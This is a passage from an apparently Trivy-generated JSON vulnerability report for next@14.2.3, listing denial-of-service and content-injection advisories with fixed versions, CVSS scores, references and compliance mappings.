"https://github.com/advisories/GHSA-8h8q-6873-q5fj", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "raw": { "VulnerabilityID": "GHSA-8h8q-6873-q5fj", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-8h8q-6873-q5fj", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:92e1aa37bcc2db1c15708088885b76cf9ca9d3d8c1fc2283d064ff5d037c3529", "Title": "Next.js Vulnerable to Denial of Service with Server Components", "Description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh). \n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj", "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-w94c-4vhp-22gx", "https://nvd.nist.gov/vuln/detail/CVE-2026-23870" ], "PublishedDate": "2026-05-11T14:50:27Z", "LastModifiedDate": "2026-05-11T14:50:27Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.333333333333336, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3cc6d1d18936ff7b", "ruleId": "GHSA-h25m-26qc-wcjf", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components", "title": "GHSA-h25m-26qc-wcjf", "description": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.", "remediation": "https://github.com/advisories/GHSA-h25m-26qc-wcjf", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "raw": { "VulnerabilityID": "GHSA-h25m-26qc-wcjf", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.0.8, 15.1.12, 15.2.9, 15.3.9, 15.4.11, 15.5.10, 15.6.0-canary.61, 16.0.11, 16.1.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-h25m-26qc-wcjf", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:ff28fec564d432dbea049c0723e9e41bc233533a7d1c711b172100b98425733b", "Title": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components", "Description": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf", "https://nvd.nist.gov/vuln/detail/CVE-2026-23864", "https://vercel.com/changelog/summary-of-cve-2026-23864" ], "PublishedDate": "2026-01-28T15:38:01Z", "LastModifiedDate": "2026-01-28T15:38:01Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.333333333333336, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2384ada699a3c38e", "ruleId": "GHSA-mwv6-3258-q52c", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next Vulnerable to Denial of Service with Server Components", "title": "GHSA-mwv6-3258-q52c", "description": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.", "remediation": "https://github.com/advisories/GHSA-mwv6-3258-q52c", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "raw": { "VulnerabilityID": "GHSA-mwv6-3258-q52c", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.34, 15.0.6, 15.1.10, 15.2.7, 15.3.7, 15.4.9, 15.5.8, 15.6.0-canary.59, 16.0.9, 16.1.0-canary.17", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-mwv6-3258-q52c", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:618188aa35b0d11fb0379e3452fe5b242450d218f40d168c6f6557825e95070a", "Title": "Next Vulnerable to Denial of Service with Server Components", "Description": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c", "https://nextjs.org/blog/security-update-2025-12-11", "https://www.cve.org/CVERecord?id=CVE-2025-55184" ], "PublishedDate": "2025-12-11T22:49:27Z", "LastModifiedDate": "2025-12-11T22:49:28Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.333333333333336, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9076a243c95555c6", "ruleId": "GHSA-q4gf-8mx6-v5v3", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next.js has a Denial of Service with Server Components", "title": "GHSA-q4gf-8mx6-v5v3", "description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg). You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", "remediation": "https://github.com/advisories/GHSA-q4gf-8mx6-v5v3", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "raw": { "VulnerabilityID": "GHSA-q4gf-8mx6-v5v3", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.15, 16.2.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-q4gf-8mx6-v5v3", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:da8071eff38bff6de90b2e9abbd23b85c6d34bf93862a462071e7b8a1af9dee8", "Title": "Next.js has a Denial of Service with Server Components", "Description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg). You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-q4gf-8mx6-v5v3", "https://vercel.com/changelog/summary-of-cve-2026-23869" ], "PublishedDate": "2026-04-10T15:35:47Z", "LastModifiedDate": "2026-04-10T15:35:47Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.333333333333336, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "85e92c5109af9055", "ruleId": "CVE-2024-47831", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "next.js: Next.js image optimization has Denial of Service condition", "title": "CVE-2024-47831", "description": "Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x, 12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in the image optimization feature which allows for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js` file that is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value nor the Next.js application that is hosted on Vercel are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround, ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned.", "remediation": "https://avd.aquasec.com/nvd/cve-2024-47831", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-674" ] }, "raw": { "VulnerabilityID": "CVE-2024-47831", "VendorIDs": [ "GHSA-g77x-44xx-532m" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-47831", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:870deb891342fbe836ab949cbe906351d888b979160e220ba5de55491995cc81", "Title": "next.js: Next.js image optimization has Denial of Service condition", "Description": "Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x, 12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in the image optimization feature which allows for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js` file that is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value nor the Next.js application that is hosted on Vercel are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround, ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned.", "Severity": "MEDIUM", "CweIDs": [ "CWE-674" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U", "V3Score": 5.9, "V40Score": 4.6 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2024-47831", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/d11cbc9ff0b1aaefabcba9afe1e562e0b1fde65a", "https://github.com/vercel/next.js/security/advisories/GHSA-g77x-44xx-532m", "https://nvd.nist.gov/vuln/detail/CVE-2024-47831", "https://www.cve.org/CVERecord?id=CVE-2024-47831" ], "PublishedDate": "2024-10-14T18:15:05.013Z", "LastModifiedDate": "2024-11-08T15:39:21.823Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 14.029866666666669, "epss": 0.01306, "epss_percentile": 0.79982, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.05224, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ec4e4216710b1a54", "ruleId": "CVE-2024-56332", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions", "title": "CVE-2024-56332", "description": "Next.js is a React framework for building full-stack web applications. Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers to construct requests that leaves requests to Server Actions hanging until the hosting provider cancels the function execution. This vulnerability can also be used as a Denial of Wallet (DoW) attack when deployed in providers billing by response times. (Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time.). Deployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing. This is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has no other mitigations to those then this vulnerability is novel. This vulnerability affects only Next.js deployments using Server Actions. The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that users upgrade to a safe version. There are no official workarounds.", "remediation": "https://avd.aquasec.com/nvd/cve-2024-56332", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-770" ] }, "raw": { "VulnerabilityID": "CVE-2024-56332", "VendorIDs": [ "GHSA-7m27-7ghc-44w9" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "13.5.8, 14.2.21, 15.1.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-56332", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:0901356f7f4fa09450af3a433f9f257bcba669b0b1a39982832d1306434411e5", "Title": "next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions", "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers to construct requests that leaves requests to Server Actions hanging until the hosting provider cancels the function execution. This vulnerability can also be used as a Denial of Wallet (DoW) attack when deployed in providers billing by response times. (Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time.). Deployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing. This is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has no other mitigations to those then this vulnerability is novel. This vulnerability affects only Next.js deployments using Server Actions. The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that users upgrade to a safe version. There are no official workarounds.", "Severity": "MEDIUM", "CweIDs": [ "CWE-770" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2024-56332", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-7m27-7ghc-44w9", "https://nvd.nist.gov/vuln/detail/CVE-2024-56332", "https://www.cve.org/CVERecord?id=CVE-2024-56332" ], "PublishedDate": "2025-01-03T21:15:13.55Z", "LastModifiedDate": "2025-09-10T15:48:41.83Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.559466666666669, "epss": 0.00424, "epss_percentile": 0.62356, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.01696, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "396a9deaca66993c", "ruleId": "CVE-2025-55173", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "nextjs: Next.js Content Injection Vulnerability for Image Optimization", "title": "CVE-2025-55173", "description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization is vulnerable to content injection. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5.", "remediation": "https://avd.aquasec.com/nvd/cve-2025-55173", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-20" ] }, "raw": { "VulnerabilityID": "CVE-2025-55173", "VendorIDs": [ "GHSA-xv57-4mr9-wg8v" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.31, 15.4.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-55173", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:4f427324d504eade5234a30344e36974820c0e709bf9b4e93f269dc3d12b445e", "Title": "nextjs: Next.js Content Injection Vulnerability for Image Optimization", "Description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization is vulnerable to content injection. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-20" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "V3Score": 4.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "V3Score": 4.3 } }, "References": [ "http://vercel.com/changelog/cve-2025-55173", "https://access.redhat.com/security/cve/CVE-2025-55173", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd", "https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v", "https://nvd.nist.gov/vuln/detail/CVE-2025-55173", "https://vercel.com/changelog/cve-2025-55173", "https://www.cve.org/CVERecord?id=CVE-2025-55173" ], "PublishedDate": "2025-08-29T22:15:31.75Z", "LastModifiedDate": "2025-09-08T16:42:57.183Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "owaspTop10_2021": [ "A03:2021" ], "cweTop25_2024": [ { "id": "CWE-20", "rank": 4, "category": "Input Validation" } ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", 